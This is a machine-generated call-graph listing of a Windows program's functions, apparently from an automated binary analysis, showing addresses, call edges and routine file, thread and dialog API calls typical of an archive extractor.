28962->28972 28964 b1169a 47 API calls 28963->28964 28967 b0f5d7 28964->28967 28965 b25787 5 API calls 28966 b0f638 28965->28966 28966->28947 28968 b0f5f6 28967->28968 28969 b0f5e4 28967->28969 28970 b0f5e7 SetFileAttributesW 28967->28970 28968->28972 28974 b019a9 26 API calls 28968->28974 28969->28970 28970->28968 28972->28965 28973->28959 28974->28972 28976 b02f26 28975->28976 28977 b02f2f 28975->28977 28976->28774 28978 b0120c 28 API calls 28977->28978 28978->28976 28980 b05975 28979->28980 28981 b05a3a 28979->28981 28985 b05987 28980->28985 28986 b03029 28 API calls 28980->28986 28987 b058cb 45 API calls 28981->28987 28985->28779 28986->28985 28988->28792 28990 b0e015 28989->28990 28991 b0dfeb 28989->28991 28990->28801 28991->28990 29000 b0ec63 28991->29000 28995 b0de76 28994->28995 28996 b0de5c 28994->28996 28997 b0de95 28995->28997 29014 b0925b 109 API calls 28995->29014 28996->28995 28998 b0de68 CloseHandle 28996->28998 28997->28801 28998->28995 29001 b0ec6f __EH_prolog3_GS 29000->29001 29002 b0ec7c DeleteFileW 29001->29002 29003 b0ec8c 29002->29003 29011 b0ecf4 29002->29011 29005 b1169a 47 API calls 29003->29005 29004 b25787 5 API calls 29006 b0e013 29004->29006 29007 b0ecac 29005->29007 29006->28801 29008 b0ecc8 29007->29008 29009 b0ecb9 29007->29009 29010 b0ecbc DeleteFileW 29007->29010 29008->29011 29013 b019a9 26 API calls 29008->29013 29009->29010 29010->29008 29011->29004 29013->29011 29014->28997 29016 b20324 29015->29016 29017 b2031d 29015->29017 29016->29017 29024 b01b63 29016->29024 29017->28819 29019->28819 29020->28819 29021->28819 29022->28819 29025 b01b8e 29024->29025 29026 b01b6f 29024->29026 29028 b013f7 28 API calls 29025->29028 29026->29016 29028->29026 29030 b16a99 _wcslen 29029->29030 29031 b01be3 28 API calls 29030->29031 29032 b16abb 29031->29032 29032->28828 29034 b16a74 29033->29034 29035 b16a89 28 API calls 29034->29035 29036 b16a86 29035->29036 29037 b0b03d 29036->29037 29038 b0b049 __EH_prolog3_GS 29037->29038 29084 b12815 29038->29084 29040 b0b092 29090 b0b231 29040->29090 29043 b01a66 26 API calls 29044 b0b120 29043->29044 29045 b01a66 26 API calls 29044->29045 29046 b0b128 29045->29046 29047 b256f6 28 API calls 29046->29047 29048 b0b13f 29047->29048 29095 b1a599 29048->29095 29050 b0b172 29051 b25787 5 API calls 29050->29051 29052 b0b179 29051->29052 29053 b0b3e1 29052->29053 29054 b0b3ed __EH_prolog3_GS 29053->29054 29055 b0b484 29054->29055 29056 b0b478 29054->29056 29135 b0f711 29054->29135 29059 b0b4e0 29055->29059 29102 b0bc65 29055->29102 29057 b01a66 26 API calls 29056->29057 29057->29055 29060 b0b529 29059->29060 29142 b0204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29059->29142 29062 b25787 5 API calls 29060->29062 29063 b0b543 29062->29063 29065 b0b194 29063->29065 29820 b0d6bc 29065->29820 29068 b0b1d0 29070 b01a66 26 API calls 29068->29070 29071 b0b1e8 29070->29071 29072 b01a66 26 API calls 29071->29072 29073 b0b1f3 29072->29073 29074 b01a66 26 API calls 29073->29074 29075 b0b1fe 29074->29075 29834 b128aa 29075->29834 29077 b0b206 29078 b01a66 26 API calls 29077->29078 29079 b0b20e 29078->29079 29080 b01a66 26 API calls 29079->29080 29081 b0b216 29080->29081 29082 b0d869 26 API calls 29081->29082 29083 b0b21d 29082->29083 29083->28837 29085 b12821 __EH_prolog3 29084->29085 29086 b256f6 28 API calls 29085->29086 29087 b1285f 29086->29087 29088 b256f6 28 API calls 29087->29088 29089 b12883 29088->29089 29089->29040 29091 b025a4 26 API calls 29090->29091 29092 b0b23f 29091->29092 29093 b025a4 26 API calls 29092->29093 29094 b0b118 29093->29094 29094->29043 29096 b1a5a5 __EH_prolog3 29095->29096 29097 b256f6 28 API calls 29096->29097 29098 b1a5bf 29097->29098 29100 b1a5d6 29098->29100 29101 b17445 112 API calls 29098->29101 29100->29050 29101->29100 29103 b0bc80 29102->29103 29143 b020b0 29103->29143 29105 b0bca7 29106 b0bcba 29105->29106 29365 b0e910 29105->29365 29110 b0bcec 29106->29110 29153 b027e0 29106->29153 29109 b0bce8 29109->29110 29177 b02d41 160 API calls __EH_prolog3_GS 29109->29177 29342 b0232c 29110->29342 29116 b0bd14 29117 b0be08 29116->29117 29118 b07673 28 API calls 29116->29118 29178 b0bec2 7 API calls 29117->29178 29120 b0bd36 29118->29120 29369 b11e54 46 API calls 2 library calls 29120->29369 29122 b0be16 29124 b0be76 29122->29124 29179 b1864f 29122->29179 29123 b0f711 53 API calls 29130 b0bd53 29123->29130 29124->29110 29182 b052d8 29124->29182 29194 b0bf3d 29124->29194 29125 b0bde8 29129 b01a66 26 API calls 29125->29129 29128 b01a66 26 API calls 29128->29130 29131 b0bded 29129->29131 29130->29123 29130->29125 29130->29128 29370 b11e54 46 API calls 2 library calls 29130->29370 29134 b01a66 26 API calls 29131->29134 29134->29117 29136 b11a9f 5 API calls 29135->29136 29137 b0f723 29136->29137 29138 b0f74b 29137->29138 29795 b0f826 29137->29795 29138->29054 29141 b0f738 FindClose 29141->29138 29142->29060 29144 b020bc __EH_prolog3 29143->29144 29145 b12815 28 API calls 29144->29145 29146 b020e8 29145->29146 29147 b256f6 28 API calls 29146->29147 29151 b02193 29146->29151 29149 b02180 29147->29149 29149->29151 29371 b076e7 29149->29371 29379 b1026f 29151->29379 29152 b02227 __cftof 29152->29105 29154 b027ec __EH_prolog3 29153->29154 29155 b011dd 28 API calls 29154->29155 29159 b02838 29154->29159 29174 b0298b 29154->29174 29160 b02882 29155->29160 29156 b029a9 29408 b0204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29156->29408 29158 b052d8 133 API calls 29164 b029f4 29158->29164 29159->29156 29161 b029b6 29159->29161 29175 b0e850 111 API calls 29160->29175 29161->29158 29161->29174 29162 b02a3c 29166 b02a6f 29162->29166 29162->29174 29409 b0204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29162->29409 29164->29162 29165 b052d8 133 API calls 29164->29165 29165->29164 29166->29174 29176 b0e850 111 API calls 29166->29176 29167 b02995 29170 b02e8b 26 API calls 29167->29170 29168 b02986 29169 b02e8b 26 API calls 29168->29169 29169->29174 29170->29159 29171 b052d8 133 API calls 29173 b02ac0 29171->29173 29172 b028ad 29172->29167 29172->29168 29173->29171 29173->29174 29174->29109 29175->29172 29176->29173 29177->29116 29178->29122 29410 b24300 29179->29410 29183 b052e4 29182->29183 29184 b052e8 29182->29184 29183->29124 29193 b0e850 111 API calls 29184->29193 29185 b052fa 29186 b05323 29185->29186 29187 b05315 29185->29187 29437 b03d9d 131 API calls 3 library calls 29186->29437 29188 b05355 29187->29188 29436 b048aa 118 API calls 2 library calls 29187->29436 29188->29124 29191 b05321 29191->29188 29438 b0344b 89 API calls 29191->29438 29193->29185 29195 b0bf95 29194->29195 29200 b0bfc4 29195->29200 29207 b0c2fd 29195->29207 29536 b1cdb4 135 API calls __EH_prolog3_GS 29195->29536 29197 b0d2e5 29198 b0d331 29197->29198 29199 b0d2ea 29197->29199 29198->29207 29608 b1cdb4 135 API calls __EH_prolog3_GS 29198->29608 29199->29207 29607 b0ab88 185 API calls 29199->29607 29200->29197 29205 b0bfeb 29200->29205 29200->29207 29201 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29202 b0d327 29201->29202 29202->29124 29205->29207 29439 b07e1b 29205->29439 29207->29201 29208 b0c0c8 29451 b1106b 29208->29451 29212 b0c151 29217 b0c16f 29212->29217 29538 b12095 45 API calls __EH_prolog3_GS 29212->29538 29214 b0c239 29215 b0c269 29214->29215 29218 b0c374 29214->29218 29222 b0c29b 29215->29222 29539 b019a9 26 API calls 29215->29539 29216 b0d205 29219 b0c948 29216->29219 29256 b0c743 29216->29256 29217->29214 29541 b10ddb 28 API calls 29217->29541 29218->29216 29223 b0c3ea 29218->29223 29224 b0c3cf 29218->29224 29234 b0c97a 29219->29234 29574 b019a9 26 API calls 29219->29574 29222->29207 29540 b019a9 26 API calls 29222->29540 29238 b0c409 29223->29238 29543 b0b92d 56 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29223->29543 29227 b01a66 26 API calls 29224->29227 29232 b0c3da 29227->29232 29229 b0d276 29229->29207 29606 b019a9 26 API calls 29229->29606 29233 b01a66 26 API calls 29232->29233 29233->29207 29234->29207 29575 b019a9 26 API calls 29234->29575 29236 b0c33d _wcslen 29542 b0f103 52 API calls 2 library calls 29236->29542 29237 b0c4ea 29461 b0b2ee 29237->29461 29238->29237 29239 b0f711 53 API calls 29238->29239 29249 b0c49b 29239->29249 29243 b0c5c2 29244 b0c7d8 29243->29244 29248 b0c5cf 29243->29248 29552 b12a36 115 API calls 29244->29552 29246 b01a66 26 API calls 29246->29237 29280 b0c62c 29248->29280 29546 b057c0 28 API calls 2 library calls 29248->29546 29249->29246 29251 b0c501 29257 b0c551 29251->29257 29544 b019a9 26 API calls 29251->29544 29254 b0c8f0 29261 b0c9eb 29254->29261 29276 b0c8ff 29254->29276 29255 b0c830 29255->29254 29263 b0c859 29255->29263 29256->29229 29605 b019a9 26 API calls 29256->29605 29257->29207 29545 b019a9 26 API calls 29257->29545 29278 b0c874 29261->29278 29467 b0b345 29261->29467 29262 b0c940 29265 b0ddc7 114 API calls 29262->29265 29268 b0ed0d 49 API calls 29263->29268 29270 b0ca64 29263->29270 29263->29278 29265->29219 29266 b0ca01 29269 b0ca05 29266->29269 29473 b0b778 29266->29473 29267 b0d1f2 29271 b0ddc7 114 API calls 29267->29271 29272 b0c8b3 29268->29272 29273 b0ddc7 114 API calls 29269->29273 29270->29267 29294 b0cac5 29270->29294 29576 b0e152 29270->29576 29271->29216 29272->29278 29554 b0d8b8 29272->29554 29273->29256 29276->29262 29573 b0b544 144 API calls __EH_prolog3_GS 29276->29573 29278->29269 29278->29270 29283 b0b345 90 API calls 29278->29283 29279 b0cb15 29286 b0fd70 28 API calls 29279->29286 29280->29256 29281 b0c77a 29280->29281 29290 b0c781 29280->29290 29547 b0b015 28 API calls 29280->29547 29548 b12a36 115 API calls 29280->29548 29549 b032d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29280->29549 29550 b0b8ed 89 API calls 29280->29550 29551 b032d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29281->29551 29288 b0ca5e 29283->29288 29307 b0cb2f 29286->29307 29288->29269 29288->29270 29290->29255 29553 b0ede9 119 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29290->29553 29292 b0cab7 29580 b09653 109 API calls 29292->29580 29503 b0fd70 29294->29503 29295 b0cc21 29296 b0cc76 29295->29296 29297 b0cf27 29295->29297 29298 b0cd33 29296->29298 29300 b0cc94 29296->29300 29301 b0cf50 29297->29301 29302 b0cf39 29297->29302 29325 b0ccb5 29297->29325 29584 b122b9 28 API calls 29298->29584 29304 b0ccd8 29300->29304 29312 b0cca3 29300->29312 29507 b19625 29301->29507 29591 b0d771 29302->29591 29303 b0cd69 29308 b1106b 45 API calls 29303->29308 29304->29325 29583 b0a7a2 142 API calls 29304->29583 29307->29295 29581 b0e39d 8 API calls 29307->29581 29310 b0cd76 29308->29310 29309 b0cf73 29523 b194ea 29309->29523 29585 b0b92d 56 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29310->29585 29582 b032d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29312->29582 29318 b0cdaf 29319 b0cddd 29318->29319 29320 b0cdcd 29318->29320 29321 b0cddf 29318->29321 29326 b0ce3e 29319->29326 29588 b019a9 26 API calls 29319->29588 29586 b0a496 119 API calls 29320->29586 29587 b0d3d7 135 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29321->29587 29328 b0cf15 29325->29328 29590 b0fd28 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29325->29590 29326->29325 29589 b019a9 26 API calls 29326->29589 29331 b0d044 29328->29331 29602 b032d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29328->29602 29330 b0d115 29531 b0e772 29330->29531 29331->29267 29331->29330 29335 b0d161 29331->29335 29530 b0e8d9 SetEndOfFile 29331->29530 29334 b0d159 29336 b0de50 110 API calls 29334->29336 29335->29267 29337 b0f58b 49 API calls 29335->29337 29336->29335 29338 b0d1d2 29337->29338 29338->29267 29603 b032d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29338->29603 29340 b0d1e8 29604 b09500 109 API calls __EH_prolog3_GS 29340->29604 29343 b0233e 29342->29343 29348 b02350 29342->29348 29343->29348 29791 b023b0 26 API calls 29343->29791 29344 b01a66 26 API calls 29345 b02369 29344->29345 29792 b02ed0 26 API calls 29345->29792 29348->29344 29349 b02374 29793 b024d9 26 API calls 29349->29793 29366 b0e927 29365->29366 29367 b0e931 29366->29367 29794 b093d7 110 API calls __EH_prolog3_GS 29366->29794 29367->29106 29369->29130 29370->29130 29372 b076f3 __EH_prolog3 29371->29372 29387 b10aaf 29372->29387 29374 b076fd 29390 b14f2b 29374->29390 29376 b07874 29394 b07cba GetCurrentProcess GetProcessAffinityMask 29376->29394 29378 b07891 29378->29151 29380 b1028f __cftof 29379->29380 29405 b10152 29380->29405 29383 b01a66 26 API calls 29384 b102b4 29383->29384 29385 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29384->29385 29386 b102bf 29385->29386 29386->29152 29395 b10b05 29387->29395 29391 b14f37 __EH_prolog3 29390->29391 29404 b01ece 28 API calls 29391->29404 29393 b14f50 29393->29376 29394->29378 29396 b10b17 __cftof 29395->29396 29399 b176e5 29396->29399 29402 b176a7 GetCurrentProcess GetProcessAffinityMask 29399->29402 29403 b10b01 29402->29403 29403->29374 29404->29393 29406 b025a4 26 API calls 29405->29406 29407 b101c7 29406->29407 29407->29383 29408->29174 29409->29166 29411 b2430c __EH_prolog3_GS 29410->29411 29412 b12117 45 API calls 29411->29412 29413 b2432f 29412->29413 29414 b14318 53 API calls 29413->29414 29415 b24342 29414->29415 29416 b16a25 53 API calls 29415->29416 29417 b2434c 29416->29417 29418 b01a66 26 API calls 29417->29418 29419 b2435b 29418->29419 29426 b23ec5 29419->29426 29422 b01a66 26 API calls 29423 b24375 29422->29423 29424 b25787 5 API calls 29423->29424 29425 b18665 29424->29425 29425->29124 29427 b23ed1 __EH_prolog3_GS 29426->29427 29428 b014a7 28 API calls 29427->29428 29429 b23edd 29428->29429 29430 b23572 21 API calls 29429->29430 29431 b23eec 29430->29431 29432 b01a66 26 API calls 29431->29432 29433 b23ef4 29432->29433 29434 b25787 5 API calls 29433->29434 29435 b23ef9 29434->29435 29435->29422 29436->29191 29437->29191 29438->29188 29440 b07e27 __EH_prolog3_GS 29439->29440 29609 b07bfc 29440->29609 29442 b07e6c 29443 b25787 5 API calls 29442->29443 29444 b07ecf 29443->29444 29444->29208 29445 b07e68 29445->29442 29448 b07ed2 29445->29448 29450 b07ebe 29445->29450 29614 b07bd6 30 API calls 29445->29614 29447 b01a66 26 API calls 29447->29442 29448->29450 29615 b0adaa CompareStringW 29448->29615 29450->29447 29460 b11095 29451->29460 29452 b11256 29453 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29452->29453 29456 b0c11b 29453->29456 29454 b0769f 45 API calls 29455 b11241 29454->29455 29457 b025a4 26 API calls 29455->29457 29456->29217 29537 b12095 45 API calls __EH_prolog3_GS 29456->29537 29458 b1124d 29457->29458 29459 b01a66 26 API calls 29458->29459 29459->29452 29460->29452 29460->29454 29462 b0b303 29461->29462 29463 b0b33b 29462->29463 29653 b09635 89 API calls 29462->29653 29463->29243 29463->29251 29465 b0b333 29654 b0204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29465->29654 29468 b0b39e 29467->29468 29469 b0b368 29467->29469 29468->29266 29469->29468 29655 b185fd 75 API calls 29469->29655 29471 b0b39a 29471->29468 29656 b032a1 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29471->29656 29474 b0b784 __EH_prolog3_GS 29473->29474 29475 b0b8e3 29474->29475 29477 b0d8b8 138 API calls 29474->29477 29476 b25787 5 API calls 29475->29476 29478 b0b8ea 29476->29478 29479 b0b7ef 29477->29479 29478->29278 29479->29475 29657 b09283 109 API calls 29479->29657 29481 b0b817 29482 b0ed0d 49 API calls 29481->29482 29483 b0b81d 29482->29483 29484 b0b838 29483->29484 29485 b0ed1f 49 API calls 29483->29485 29659 b11a27 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29484->29659 29489 b0b827 29485->29489 29487 b0b83e 29487->29475 29660 b0204b 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29487->29660 29489->29484 29658 b032a1 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29489->29658 29490 b0b850 29492 b07673 28 API calls 29490->29492 29493 b0b859 29492->29493 29494 b0b88d 29493->29494 29661 b0ede9 119 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29493->29661 29495 b0eaf3 54 API calls 29494->29495 29499 b0b8c9 29494->29499 29497 b0b8a1 29495->29497 29498 b0d8b8 138 API calls 29497->29498 29500 b0b8c5 29498->29500 29501 b01a66 26 API calls 29499->29501 29500->29499 29662 b09283 109 API calls 29500->29662 29501->29475 29504 b0fd7e 29503->29504 29506 b0fd88 29503->29506 29505 b256f6 28 API calls 29504->29505 29505->29506 29506->29279 29508 b19639 29507->29508 29509 b1975f 29508->29509 29512 b19644 29508->29512 29511 b2734a _com_raise_error RaiseException 29509->29511 29510 b19739 29510->29309 29517 b1970b 29511->29517 29512->29510 29513 b196ed 29512->29513 29514 b2d08c ___std_exception_copy 21 API calls 29512->29514 29512->29517 29513->29510 29516 b1971f 29513->29516 29513->29517 29514->29513 29515 b2734a _com_raise_error RaiseException 29521 b197a3 __EH_prolog3 __cftof 29515->29521 29516->29510 29663 b19556 89 API calls 4 library calls 29516->29663 29517->29515 29519 b19896 29519->29309 29520 b2d08c ___std_exception_copy 21 API calls 29520->29521 29521->29519 29521->29520 29664 b09384 89 API calls 29521->29664 29524 b194f3 29523->29524 29525 b1951f 29524->29525 29526 b1951d 29524->29526 29527 b19515 29524->29527 29680 b1abc8 155 API calls 29525->29680 29526->29325 29665 b1b76f 29527->29665 29530->29330 29532 b0e783 29531->29532 29535 b0e792 29531->29535 29533 b0e789 FlushFileBuffers 29532->29533 29532->29535 29533->29535 29534 b0e80f SetFileTime 29534->29334 29535->29534 29536->29200 29537->29212 29538->29217 29539->29222 29540->29207 29541->29236 29542->29214 29543->29238 29544->29257 29545->29207 29546->29280 29547->29280 29548->29280 29549->29280 29550->29280 29551->29290 29552->29290 29553->29255 29555 b0d8c5 29554->29555 29556 b0ed0d 49 API calls 29555->29556 29559 b0d8d7 29556->29559 29557 b0d93e 29558 b0d953 29557->29558 29561 b0de9a 49 API calls 29557->29561 29564 b0eaf3 54 API calls 29558->29564 29571 b0d957 29558->29571 29559->29557 29560 b0d8e8 29559->29560 29569 b0ed0d 49 API calls 29559->29569 29559->29571 29760 b1846c 61 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29559->29760 29761 b092e6 RaiseException _com_raise_error 29559->29761 29560->29559 29759 b0d990 125 API calls __EH_prolog3_GS 29560->29759 29561->29558 29565 b0d973 29564->29565 29566 b0d982 29565->29566 29567 b0d977 29565->29567 29570 b0ec63 49 API calls 29566->29570 29568 b0de9a 49 API calls 29567->29568 29568->29571 29569->29559 29570->29571 29571->29278 29573->29262 29574->29234 29575->29207 29577 b0caa5 29576->29577 29578 b0e15b GetFileType 29576->29578 29577->29294 29579 b032d2 89 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 29577->29579 29578->29577 29579->29292 29580->29294 29581->29295 29582->29325 29583->29325 29584->29303 29585->29318 29586->29319 29587->29319 29588->29326 29589->29325 29590->29328 29592 b0d77d __EH_prolog3 29591->29592 29593 b011dd 28 API calls 29592->29593 29594 b0d788 29593->29594 29595 b12af9 150 API calls 29594->29595 29601 b0d7b1 29595->29601 29596 b0d804 29598 b0d828 29596->29598 29770 b019a9 26 API calls 29596->29770 29598->29325 29600 b12af9 150 API calls 29600->29601 29601->29596 29601->29600 29762 b12ce5 29601->29762 29602->29331 29603->29340 29604->29267 29605->29229 29606->29207 29607->29207 29608->29207 29616 b0790e 29609->29616 29611 b07c1d 29611->29445 29613 b0790e 47 API calls 29613->29611 29614->29445 29615->29450 29617 b1106b 45 API calls 29616->29617 29634 b07989 _wcslen 29617->29634 29618 b07b1b 29623 b07b4a 29618->29623 29643 b019a9 26 API calls 29618->29643 29619 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29622 b07bbb 29619->29622 29622->29611 29622->29613 29624 b07b92 29623->29624 29644 b019a9 26 API calls 29623->29644 29624->29619 29625 b12117 45 API calls 29625->29634 29626 b07673 28 API calls 29626->29634 29628 b1106b 45 API calls 29628->29634 29629 b0769f 45 API calls 29629->29634 29630 b01a66 26 API calls 29630->29634 29632 b07bc2 29633 b01a66 26 API calls 29632->29633 29635 b07bc7 29633->29635 29634->29618 29634->29625 29634->29626 29634->29628 29634->29629 29634->29630 29634->29632 29637 b01b63 28 API calls 29634->29637 29638 b11a9f 29634->29638 29642 b07bd6 30 API calls 29634->29642 29636 b01a66 26 API calls 29635->29636 29636->29618 29637->29634 29639 b11ab1 29638->29639 29645 b096e5 29639->29645 29642->29634 29643->29623 29644->29624 29646 b096f1 _wcslen 29645->29646 29649 b090f4 29646->29649 29652 b09137 __cftof 29649->29652 29650 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29651 b091a9 29650->29651 29651->29634 29652->29650 29653->29465 29654->29463 29655->29471 29656->29468 29657->29481 29658->29484 29659->29487 29660->29490 29661->29494 29662->29499 29663->29510 29664->29521 29681 b197a4 29665->29681 29667 b1b78e __InternalCxxFrameHandler 29667->29667 29669 b1bb9c 29667->29669 29686 b12af9 29667->29686 29697 b17590 29667->29697 29703 b1a008 150 API calls 29667->29703 29704 b1bc05 150 API calls 29667->29704 29705 b177cf 29667->29705 29709 b19a2b 129 API calls 29667->29709 29710 b1c27f 155 API calls 29667->29710 29711 b1a814 129 API calls __InternalCxxFrameHandler 29669->29711 29671 b1bbb5 __InternalCxxFrameHandler 29672 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29671->29672 29673 b1bbfc 29672->29673 29673->29526 29680->29526 29684 b197b0 __EH_prolog3 __cftof 29681->29684 29682 b19896 29682->29667 29683 b2d08c ___std_exception_copy 21 API calls 29683->29684 29684->29682 29684->29683 29712 b09384 89 API calls 29684->29712 29694 b12b0f __InternalCxxFrameHandler 29686->29694 29687 b12c7f 29688 b12cb3 29687->29688 29713 b12ab0 29687->29713 29690 b12cd4 29688->29690 29719 b082a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29688->29719 29720 b173f8 29690->29720 29694->29687 29695 b12c76 29694->29695 29717 b0fe6f 123 API calls __EH_prolog3 29694->29717 29718 b1cdb4 135 API calls __EH_prolog3_GS 29694->29718 29695->29667 29698 b175a1 29697->29698 29699 b1759c 29697->29699 29700 b175b1 29698->29700 29702 b177cf 113 API calls 29698->29702 29736 b17628 29699->29736 29700->29667 29702->29700 29703->29667 29704->29667 29706 b17806 29705->29706 29707 b177db ResetEvent ReleaseSemaphore 29705->29707 29706->29667 29751 b175ed WaitForSingleObject 29707->29751 29709->29667 29710->29667 29711->29671 29712->29684 29714 b12ab8 29713->29714 29715 b12af5 29713->29715 29714->29715 29726 b18618 29714->29726 29715->29688 29717->29694 29718->29694 29719->29690 29721 b173ff 29720->29721 29722 b1741a 29721->29722 29734 b092e6 RaiseException _com_raise_error 29721->29734 29724 b1742b SetThreadExecutionState 29722->29724 29735 b092e6 RaiseException _com_raise_error 29722->29735 29724->29695 29729 b24231 29726->29729 29730 b160d5 29729->29730 29731 b24248 SendDlgItemMessageW 29730->29731 29732 b20678 PeekMessageW GetMessageW IsDialogMessageW TranslateMessage DispatchMessageW 29731->29732 29733 b18638 29732->29733 29733->29715 29734->29722 29735->29724 29740 b17633 29736->29740 29741 b176a1 29736->29741 29737 b17638 CreateThread 29737->29740 29747 b17760 29737->29747 29739 b17690 SetThreadPriority 29739->29740 29740->29737 29740->29739 29740->29741 29744 b092eb 109 API calls __EH_prolog3_GS 29740->29744 29745 b09500 109 API calls __EH_prolog3_GS 29740->29745 29746 b092e6 RaiseException _com_raise_error 29740->29746 29741->29698 29744->29740 29745->29740 29746->29740 29750 b1776e 116 API calls 29747->29750 29749 b17769 29750->29749 29752 b17624 29751->29752 29753 b175fe GetLastError 29751->29753 29752->29706 29757 b092eb 109 API calls __EH_prolog3_GS 29753->29757 29755 b17618 29758 b092e6 RaiseException _com_raise_error 29755->29758 29757->29755 29758->29752 29759->29560 29760->29559 29761->29559 29763 b12cfe __InternalCxxFrameHandler 29762->29763 29764 b12d18 29762->29764 29766 b12d42 29763->29766 29788 b0fe6f 123 API calls __EH_prolog3 29763->29788 29764->29763 29771 b0e948 29764->29771 29768 b173f8 2 API calls 29766->29768 29769 b12d47 29768->29769 29769->29601 29770->29598 29772 b0e954 __EH_prolog3_GS 29771->29772 29773 b0e963 29772->29773 29774 b0e976 GetStdHandle 29772->29774 29780 b0e988 29772->29780 29775 b25787 5 API calls 29773->29775 29774->29780 29777 b0eaab 29775->29777 29776 b0e9df WriteFile 29776->29780 29777->29763 29778 b0e9ad 29779 b0e9af WriteFile 29778->29779 29778->29780 29779->29778 29779->29780 29780->29773 29780->29776 29780->29778 29780->29779 29782 b0ea77 29780->29782 29789 b09230 111 API calls 29780->29789 29783 b014a7 28 API calls 29782->29783 29784 b0ea84 29783->29784 29790 b09653 109 API calls 29784->29790 29786 b0ea97 29787 b01a66 26 API calls 29786->29787 29787->29773 29788->29766 29789->29780 29790->29786 29792->29349 29794->29367 29796 b0f835 __EH_prolog3_GS 29795->29796 29797 b0f925 FindNextFileW 29796->29797 29798 b0f847 FindFirstFileW 29796->29798 29799 b0f937 GetLastError 29797->29799 29800 b0f948 29797->29800 29798->29800 29802 b0f86a 29798->29802 29818 b0f90d 29799->29818 29805 b014a7 28 API calls 29800->29805 29803 b1169a 47 API calls 29802->29803 29806 b0f88c 29803->29806 29804 b25787 5 API calls 29808 b0f733 29804->29808 29809 b0f95f 29805->29809 29807 b0f8ac 29806->29807 29810 b0f899 29806->29810 29811 b0f89c FindFirstFileW 29806->29811 29817 b0f8e8 29807->29817 29819 b019a9 26 API calls 29807->29819 29808->29138 29808->29141 29812 b1229d 45 API calls 29809->29812 29810->29811 29811->29807 29813 b0f970 29812->29813 29816 b01a66 26 API calls 29813->29816 29814 b0f902 GetLastError 29814->29818 29816->29818 29817->29800 29817->29814 29818->29804 29819->29817 29821 b0d70b 29820->29821 29826 b0d6e5 29820->29826 29856 b0d89e 29821->29856 29824 b0ec63 49 API calls 29824->29826 29825 b0b231 26 API calls 29827 b0d74c 29825->29827 29826->29821 29826->29824 29828 b01a66 26 API calls 29827->29828 29829 b0d755 29828->29829 29830 b01a66 26 API calls 29829->29830 29831 b0d75e 29830->29831 29832 b25734 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 29831->29832 29833 b0b1bf 29832->29833 29833->29068 29840 b1909b 29833->29840 29835 b128bb 29834->29835 29861 b0fb8e 29835->29861 29837 b128ed 29838 b0fb8e 118 API calls 29837->29838 29839 b128f8 29838->29839 29841 b190aa 29840->29841 29842 b174ec 118 API calls 29841->29842 29843 b190b9 29841->29843 29842->29843 29872 b14264 26 API calls 29843->29872 29845 b190e8 29873 b14264 26 API calls 29845->29873 29847 b190f3 29874 b14264 26 API calls 29847->29874 29849 b190fe 29875 b14288 26 API calls 29849->29875 29851 b19132 29852 b02e8b 26 API calls 29851->29852 29853 b1913a 29852->29853 29854 b02e8b 26 API calls 29853->29854 29855 b19142 29854->29855 29857 b0d714 29856->29857 29858 b0d8a8 29856->29858 29857->29825 29860 b0ae77 26 API calls 29858->29860 29860->29857 29862 b0fbbb 29861->29862 29864 b0fbc2 29861->29864 29865 b174ec 29862->29865 29864->29837 29866 b177cf 113 API calls 29865->29866 29867 b17518 ReleaseSemaphore 29866->29867 29868 b17556 DeleteCriticalSection CloseHandle CloseHandle 29867->29868 29869 b17538 29867->29869 29868->29864 29870 b175ed 111 API calls 29869->29870 29871 b17542 CloseHandle 29870->29871 29871->29868 29871->29869 29872->29845 29873->29847 29874->29849 29875->29851 29885 b1eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29876->29885 29878 b1eaad 29879 b1eab9 29878->29879 29886 b1eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29878->29886 29879->28842 29879->28846 29881->28843 29882->28854 29883->28854 29884->28857 29885->29878 29886->29879 29887->28867 29889 b0e910 110 API calls 29888->29889 29890 b02dc7 29889->29890 29891 b027e0 133 API calls 29890->29891 29894 b02de4 29890->29894 29892 b02dd4 29891->29892 29892->29894 29899 b0204b 89 API calls 